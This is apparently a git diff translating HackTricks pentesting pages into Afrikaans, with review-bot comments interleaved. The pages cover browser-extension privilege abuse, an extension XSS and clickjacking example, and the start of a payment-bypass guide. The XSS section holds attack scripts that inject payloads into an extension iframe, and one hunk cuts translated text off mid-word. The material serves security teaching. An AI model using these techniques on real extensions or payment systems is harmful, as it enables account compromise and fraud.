+Nie net dit nie, luisteraars soos [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **word ook baie nuttiger**. Hierdie sal in kennis gestel word wanneer 'n nuwe bladsy in 'n vlak gelaai word. {% endhint %} -### Running content scripts +### Uitvoering van inhoudskripte -Content scripts aren’t necessarily written statically into the extension manifest. Given sufficient **`host_permissions`**, **extensions can also load them dynamically by calling** [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **or** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript). +Inhoudskripte word nie noodwendig staties in die uitbreidings-manifest geskryf nie. Met voldoende **`host_permissions`** kan uitbreidings hulle ook dinamies laai deur [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **of** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript) te roep. -Both APIs allow executing not merely files contained in the extensions as content scripts but also **arbitrary cod**e. The former allows passing in JavaScript code as a string while the latter expects a JavaScript function which is less prone to injection vulnerabilities. Still, both APIs will wreak havoc if misused. +Beide API's maak dit moontlik om nie net lêers wat in die uitbreiding as inhoudskripte ingesluit is nie, maar ook **willekeurige kode** uit te voer. Die eerste maak dit moontlik om JavaScript-kode as 'n string in te voer, terwyl die laaste 'n JavaScript-funksie verwag wat minder vatbaar is vir inspuitingskwesbaarhede. Tog sal beide API's skade aanrig as dit verkeerd gebruik word. 
{% hint style="danger" %} -In addition to the capabilities above, content scripts could for example **intercept credentials** as these are entered into web pages. Another classic way to abuse them is **injecting advertising** on each an every website. Adding **scam messages** to abuse credibility of news websites is also possible. Finally, they could **manipulate banking** websites to reroute money transfers. +Bo en behalwe die bogenoemde vermoëns, kan inhoudskripte byvoorbeeld ook **geloofsbriewe onderskep** soos dit in webbladsye ingevoer word. 'n Klassieke manier om hulle te misbruik, is om **advertensies in te spuit** op elke webwerf. Dit is ook moontlik om **bedrieglike boodskappe** by te voeg om die geloofwaardigheid van nuuswebwerwe te misbruik. Uiteindelik kan hulle **bankwebwerwe manipuleer** om geldoordragte om te lei. {% endhint %} -### Implicit privileges +### Implisiete voorregte -Some extension privileges **don’t have to be explicitly declared**. One example is the [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): its basic functionality is accessible without any privileges whatsoever. Any extension can be notified when you open and close tabs, it merely won’t know which website these tabs correspond with. +Sommige uitbreidingsvoorregte **hoef nie eksplisiet verklaar te word nie**. Een voorbeeld hiervan is die [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): sy basiese funksionaliteit is toeganklik sonder enige voorregte. Enige uitbreiding kan in kennis gestel word wanneer jy vlakke oopmaak en sluit, dit sal eenvoudig nie weet met watter webwerf hierdie vlakke ooreenstem nie. -Sounds too harmless? The [tabs.create() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/create) is somewhat less so. 
It can be used to **create a new tab**, essentially the same as [window.open()](https://developer.mozilla.org/en-US/docs/Web/API/Window/open) which can be called by any website. Yet while `window.open()` is subject to the **pop-up blocker, `tabs.create()` isn’t**. +Klink dit te onskadelik? Die [tabs.create() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/create) is ietwat minder onskadelik. Dit kan gebruik word om **'n nuwe vlak te skep**, essensieel dieselfde as [window.open()](https://developer.mozilla.org/en-US/docs/Web/API/Window/open) wat deur enige webwerf geroep kan word. Tog is `window.open()` onderhewig aan die **pop-up blokkeerder, `tabs.create()` nie**. {% hint style="danger" %} -An extension can create any number of tabs whenever it wants. +'n Uitbreiding kan enige aantal vlakke skep wanneer dit wil. {% endhint %} -If you look through possible `tabs.create()` parameters, you’ll also notice that its capabilities go way beyond what `window.open()` is allowed to control. And while Firefox doesn’t allow `data:` URIs to be used with this API, Chrome has no such protection. **Use of such URIs on the top level has been** [**banned due to being abused for phishing**](https://bugzilla.mozilla.org/show\_bug.cgi?id=1331351)**.** +As jy deur moontlike `tabs.create()`-parameters kyk, sal jy ook besef dat sy vermoëns verder gaan as wat `window.open()` toegelaat word om te beheer. En terwyl Firefox nie toelaat dat `data:`-URI's met hierdie API gebruik word nie, het Chrome geen sulke beskerming nie. **Die gebruik van sulke URI's op die boonste vlak is** [**verbied weens misbruik vir hengelary**](https://bugzilla.mozilla.org/show\_bug.cgi?id=1331351)**.** -[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is very similar to `tabs.create()` but will **modify an existing tab**. 
So a malicious extension can for example arbitrarily load an advertising page into one of your tabs, and it can activate the corresponding tab as well. +[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is baie soortgelyk aan `tabs.create()` maar sal **'n bestaande vlak wysig**. 'n Kwaadwillige uitbreiding kan byvoorbeeld arbitrêr 'n advertensiebladsy in een van jou vlakke laai, en dit kan ook die ooreenstemmende vlak aktiveer. -### Webcam, geolocation and friends +### Webcam, geolokalisering en vriende -You probably know that websites can request special permissions, e.g. in order to access your webcam (video conferencing tools) or geographical location (maps). It’s features with considerable potential for abuse, so users each time have to confirm that they still want this. +Jy weet waarskynlik dat webwerwe spesiale toestemmings kan vra, bv. om toegang tot jou webcam (video-konferensie-instrumente) of geografiese ligging (kaarte) te verkry. Dit is funksies met aansienlike potensiaal vir misbruik, sodat gebruikers elke keer moet bevestig dat hulle dit steeds wil hê. {% hint style="danger" %} -Not so with browser extensions. **If a browser extension** [**wants access to your webcam or microphone**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**, it only needs to ask for permission once** +Nie so met webblaaier-uitbreidings nie. **As 'n webblaaier-uitbreiding** [**toegang tot jou webcam of mikrofoon wil hê**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**, hoef dit net een keer om toestemming te vra** {% endhint %} -Typically, an extension will do so immediately after being installed. Once this prompt is accepted, **webcam access is possible at any time**, even if the user isn’t interacting with the extension at this point. Yes, a user will only accept this prompt if the extension really needs webcam access. 
But after that they have to trust the extension not to record anything secretly. +Gewoonlik sal 'n uitbreiding dit onmiddellik na installasie doen. Sodra hierdie versoek aanvaar is, is **webcam-toegang te eniger tyd moontlik**, selfs as die gebruiker nie op daardie oomblik met die uitbreiding interaksie het nie. Ja, 'n gebruiker sal hierdie versoek slegs aanvaar as die uitbreiding regtig webcam-toegang benodig. Maar daarna moet hulle die uitbreiding vertrou om niks heimlik op te neem nie. -With access to [your exact geographical location](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) or [contents of your clipboard](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard\_API), granting permission explicitly is unnecessary altogether. **An extension simply adds `geolocation` or `clipboard` to the** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **of its manifest**. These access privileges are then granted implicitly when the extension is installed. So a malicious or compromised extension with these privileges can create your movement profile or monitor your clipboard for copied passwords without you noticing anything. +Met toegang tot [jou presiese geografiese ligging](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) of [inhoud van jou knipbord](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard\_API), is dit heeltemal onnodig om toestemming eksplisiet te verleen. **'n Uitbreiding voeg eenvoudig `geolocation` of `clipboard` by die** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **van sy manifest**. Hierdie toegangsvoorregte word dan implisiet verleen wanneer die uitbreiding geïnstalleer word. Dus kan 'n kwaadwillige of gekompromitteerde uitbreiding met hierdie voorregte jou bewegingsprofiel skep of jou knipbord monitor vir gekopieerde wagwoorde sonder dat jy iets daarvan besef. 
-Adding the **`history`** keyword to the [permissions entry](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) of the extension manifest grants **access to the** [**history API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history). It allows retrieving the user’s entire browsing history all at once, without waiting for the user to visit these websites again. +Deur die sleutelwoord **`history`** by die [permissions entry](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) van die uitbreidings-manifest te voeg, word **toegang tot die** [**history API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history) **verleen**. Dit maak dit moontlik om die gebruiker se volledige blaai-geskiedenis in een keer te herwin, sonder om te wag vir die gebruiker om hierdie webwerwe weer te besoek. -The **`bookmarks`** **permission** has similar abuse potential, this one allows **reading out all bookmarks via the** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks). +Die **`bookmarks`** **permission** het soortgelyke misbruikspotensiaal, dit maak dit moontlik om **alle bladmerke uit te lees via die** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks). -### Storage permission +### Stoor-toestemming -The extension storage is merely a key-value collection, very similar to [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) that any website could use. So no sensitive information should be stored here. - -However, advertising companies could also abuse this storage. 
- -### More permissions - -You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**.** - -## Prevention - -The policy of Google's developer explicitly forbids extensions from requesting more privileges than necessary for their functionality, effectively mitigating excessive permission requests. An instance where a browser extension overstepped this boundary involved its distribution with the browser itself rather than through an add-on store. - -Browsers could further curb the misuse of extension privileges. For instance, Chrome's [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) and [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) APIs, used for screen recording, are designed to minimize abuse. The tabCapture API can only be activated through direct user interaction, such as clicking on the extension icon, while desktopCapture requires user confirmation for the window to be recorded, preventing clandestine recording activities. - -However, tightening security measures often results in decreased flexibility and user-friendliness of extensions. The [activeTab permission](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab_permission) illustrates this trade-off. It was introduced to eliminate the need for extensions to request host privileges across the entire internet, allowing extensions to access only the current tab upon explicit activation by the user. 
This model is effective for extensions requiring user-initiated actions but falls short for those requiring automatic or pre-emptive actions, thereby compromising convenience and immediate responsiveness. - -## **References** +Die +## **Verwysings** * [https://palant.info/2022/08/17/impact-of-extension-privileges/](https://palant.info/2022/08/17/impact-of-extension-privileges/) * [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
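Review bot: the tail of this hunk deletes content instead of translating it: the English lines from `-### More permissions` through the `## Prevention` paragraphs (Google policy, `tabCapture`/`desktopCapture`, the `activeTab` trade-off) and the storage-permission sentence `However, advertising companies could also abuse this storage.` are removed, and the only replacement is the truncated `+Die` sitting directly before `+## **Verwysings**`, so the Afrikaans page ends mid-word and loses two sections. Restore and translate those lines before merging. Two smaller points: in `+Die volgende `host_toestemmings` maak basies elke webblaaier moontlik:` the manifest key is a code identifier and must stay `host_permissions` (the heading `+## Misbruik van `permissions` en `host_permissions`` already gets this right), and `+### Vlakke` renders browser tabs as "levels"; keep `Tabs` or use `Oortjies`, which is what the later `tabs API` references and `tabs.create()`/`tabs.update()` text are about. The JSON block also loses its indentation (`- "*://*/*"` becomes `+"*://*/*"`), which changes nothing functionally but adds needless churn to every code line.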
diff --git a/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md b/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md index 74225cdba..2d3b3108e 100644 --- a/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md +++ b/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md @@ -1,134 +1,120 @@ -# BrowExt - XSS Example +# BrowExt - XSS Voorbeeld
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Cross-Site Scripting (XSS) through Iframe - -In this setup, a **content script** is implemented to instantiate an Iframe, incorporating a URL with query parameters as the source of the Iframe: +## Cross-Site Scripting (XSS) deur middel van Iframe +In hierdie opstelling word 'n **inhoudskrip** geïmplementeer om 'n Iframe te instansieer, wat 'n URL met navraagparameters inkorporeer as die bron van die Iframe: ```javascript chrome.storage.local.get("message", result => { - let constructedURL = chrome.runtime.getURL("message.html") + - "?content=" + encodeURIComponent(result.message) + - "&redirect=https://example.net/details"; - frame.src = constructedURL; +let constructedURL = chrome.runtime.getURL("message.html") + +"?content=" + encodeURIComponent(result.message) + +"&redirect=https://example.net/details"; +frame.src = constructedURL; }); ``` - -A publicly accessible HTML page, **`message.html`**, is designed to dynamically add content to the document body based on the parameters in the URL: - +'n Openlik toeganklike HTML-bladsy, **`message.html`**, is ontwerp om dinamies inhoud by die dokumentliggaam te voeg op grond van die parameters in die URL: ```javascript $(document).ready(() => { - let urlParams = new URLSearchParams(window.location.search); - let userContent = urlParams.get("content"); - $(document.body).html(`${userContent} `); - $('#detailBtn').on('click', () => { - let destinationURL = urlParams.get("redirect"); - chrome.tabs.create({ url: destinationURL }); - }); +let urlParams = new URLSearchParams(window.location.search); +let userContent = urlParams.get("content"); +$(document.body).html(`${userContent} `); +$('#detailBtn').on('click', () => { +let destinationURL = urlParams.get("redirect"); +chrome.tabs.create({ url: destinationURL }); +}); }); ``` - -A malicious script is executed on an adversary's page, modifying the `content` parameter of the Iframe's source to introduce a **XSS payload**. 
This is achieved by updating the Iframe's source to include a harmful script: - +'n Kwaadwillige skripsie word uitgevoer op 'n teenstander se bladsy, waar die `content` parameter van die Iframe se bron gewysig word om 'n **XSS-payload** in te sluit. Dit word bereik deur die Iframe se bron op te dateer om 'n skadelike skripsie in te sluit: ```javascript setTimeout(() => { - let targetFrame = document.querySelector("iframe").src; - let baseURL = targetFrame.split('?')[0]; - let xssPayload = ""; - let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`; +let targetFrame = document.querySelector("iframe").src; +let baseURL = targetFrame.split('?')[0]; +let xssPayload = ""; +let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`; - document.querySelector("iframe").src = maliciousURL; +document.querySelector("iframe").src = maliciousURL; }, 1000); ``` - -An overly permissive Content Security Policy such as: - +'n Oormatig toegeeflike Inhoudsveiligheidsbeleid soos: ```json "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';" ``` +maak die uitvoering van JavaScript moontlik, wat die stelsel vatbaar maak vir XSS-aanvalle. -allows the execution of JavaScript, making the system vulnerable to XSS attacks. 
- -An alternative approach to provoke the XSS involves creating an Iframe element and setting its source to include the harmful script as the `content` parameter: - +'n Alternatiewe benadering om die XSS uit te lok, behels die skep van 'n Iframe-element en die instelling van sy bron om die skadelike skrip as die `content`-parameter in te sluit: ```javascript let newFrame = document.createElement("iframe"); newFrame.src = "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" + - encodeURIComponent(""); +encodeURIComponent(""); document.body.append(newFrame); ``` +## DOM-gebaseerde XSS + ClickJacking -## DOM-based XSS + ClickJacking - -This example was taken from the [original post writeup](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/). - -The core issue arises from a DOM-based Cross-site Scripting (XSS) vulnerability located in **`/html/bookmarks.html`**. The problematic JavaScript, part of **`bookmarks.js`**, is detailed below: +Hierdie voorbeeld is geneem uit die [oorspronklike pos skryfwerk](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/). +Die kernprobleem ontstaan uit 'n DOM-gebaseerde Cross-site Scripting (XSS) kwesbaarheid wat geleë is in **`/html/bookmarks.html`**. Die problematiese JavaScript, deel van **`bookmarks.js`**, word hieronder beskryf: ```javascript $('#btAdd').on('click', function() { - var bookmarkName = $('#txtName').val(); - if ($('.custom-button .label').filter(function() { - return $(this).text() === bookmarkName; - }).length) return false; +var bookmarkName = $('#txtName').val(); +if ($('.custom-button .label').filter(function() { +return $(this).text() === bookmarkName; +}).length) return false; - var bookmarkItem = $('
'); - bookmarkItem.html('' + bookmarkName + ''); - bookmarkItem.append(''); - bookmarkItem.attr('data-title', bookmarkName); - bookmarkItem.data('timestamp', (new Date().getTime())); - $('section.bookmark-container .existing-items').append(bookmarkItem); - persistData(); +var bookmarkItem = $('
'); +bookmarkItem.html('' + bookmarkName + ''); +bookmarkItem.append(''); +bookmarkItem.attr('data-title', bookmarkName); +bookmarkItem.data('timestamp', (new Date().getTime())); +$('section.bookmark-container .existing-items').append(bookmarkItem); +persistData(); }); ``` +Hierdie stukkie haal die **waarde** uit die **`txtName`** invoerveld en gebruik **string-konkatenasie om HTML te genereer**, wat dan aan die DOM geheg word deur gebruik te maak van jQuery se `.append()` funksie. -This snippet fetches the **value** from the **`txtName`** input field and uses **string concatenation to generate HTML**, which is then appended to the DOM using jQuery’s `.append()` function. +Normaalweg sal die Chrome-uitbreiding se Inhoudsbeveiligingsbeleid (CSP) sulke kwesbaarhede voorkom. Tog is uitbuiting steeds moontlik as gevolg van **CSP-verslapping met 'unsafe-eval'** en die gebruik van jQuery se DOM-manipulasie-metodes (wat [`globalEval()`](https://api.jquery.com/jquery.globaleval/) gebruik om skripte na [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) te stuur by DOM-invoeging). -Typically, the Chrome extension's Content Security Policy (CSP) would prevent such vulnerabilities. However, due to **CSP relaxation with ‘unsafe-eval’** and the use of jQuery’s DOM manipulation methods (which employ [`globalEval()`](https://api.jquery.com/jquery.globaleval/) to pass scripts to [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) upon DOM insertion), exploitation is still possible. - -While this vulnerability is significant, its exploitation is usually contingent on user interaction: visiting the page, entering an XSS payload, and activating the “Add” button. - -To enhance this vulnerability, a secondary **clickjacking** vulnerability is exploited. 
The Chrome extension's manifest showcases an extensive `web_accessible_resources` policy: +Hoewel hierdie kwesbaarheid betekenisvol is, is die uitbuiting gewoonlik afhanklik van gebruikersinteraksie: die besoek aan die bladsy, die invoer van 'n XSS-lading en die aktivering van die "Voeg by" knoppie. +Om hierdie kwesbaarheid te verbeter, word 'n sekondêre **clickjacking**-kwesbaarheid uitgebuit. Die manifest van die Chrome-uitbreiding toon 'n uitgebreide `web_accessible_resources`-beleid: ```json "web_accessible_resources": [ - "html/bookmarks.html", - "dist/*", - "assets/*", - "font/*", - [...] +"html/bookmarks.html", +"dist/*", +"assets/*", +"font/*", +[...] ], ``` +Veral die **`/html/bookmarks.html`** bladsy is vatbaar vir framing en dus kwesbaar vir **clickjacking**. Hierdie kwesbaarheid word gebruik om die bladsy binne 'n aanvaller se webwerf te rame, en dit te oorlê met DOM-elemente om die koppelvlak bedrieglik te herontwerp. Hierdie manipulasie lei slagoffers om onbedoeld met die onderliggende uitbreiding te interaksieer. -Notably, the **`/html/bookmarks.html`** page is prone to framing, thus vulnerable to **clickjacking**. This vulnerability is leveraged to frame the page within an attacker’s site, overlaying it with DOM elements to redesign the interface deceptively. This manipulation leads victims to interact with the underlying extension unintentionally. - -## References +## Verwysings * [https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/](https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/) * [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
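Review bot: every JavaScript and JSON block in this hunk has its indentation stripped (`- let constructedURL = ...` becomes `+let constructedURL = ...`, the `$('#btAdd')` handler body and the `web_accessible_resources` array are flattened to column 0) and the blank lines between prose and the fences are dropped; behaviour is unchanged, but the snippets become harder to read and the diff touches lines a translation should never touch, so please leave code lines and their surrounding blank lines byte-identical and translate prose only. Terminology: `+'n Kwaadwillige skripsie word uitgevoer op 'n teenstander se bladsy` uses "skripsie" (a thesis) where "skrip" is meant; the same hunk already uses "inhoudskrip" and "skadelike skrip", so keep "skrip" throughout. The button label in `die aktivering van die "Voeg by" knoppie` refers to the `#btAdd` control of the extension shown in the code above, so quoting it as "Add" keeps the link between the prose and the snippet.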
diff --git a/pentesting-web/bypass-payment-process.md b/pentesting-web/bypass-payment-process.md index acda14d3d..8a7fa7098 100644 --- a/pentesting-web/bypass-payment-process.md +++ b/pentesting-web/bypass-payment-process.md @@ -1,61 +1,61 @@ -# Bypass Payment Process +# Bypass Betalingsproses
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Payment Bypass Techniques +## Bypas Betalings Tegnieke -### Request Interception -During the transaction process, it is crucial to monitor the data being exchanged between the client and the server. This can be done by intercepting all requests. Within these requests, look out for parameters with significant implications, such as: +### Versoek Onderbreking +Tydens die transaksieproses is dit noodsaaklik om die data wat uitgewissel word tussen die kliënt en die bediener te monitor. Dit kan gedoen word deur alle versoek te onderskep. Binne hierdie versoek moet jy let op parameters met belangrike implikasies, soos: -- **Success**: This parameter often indicates the status of the transaction. -- **Referrer**: It might point to the source from where the request originated. -- **Callback**: This is typically used for redirecting the user after a transaction is completed. +- **Sukses**: Hierdie parameter dui dikwels die status van die transaksie aan. +- **Verwysingsbron**: Dit kan dui op die bron waarvandaan die versoek afkomstig is. +- **Terugroep**: Dit word tipies gebruik om die gebruiker na 'n voltooide transaksie om te lei. 
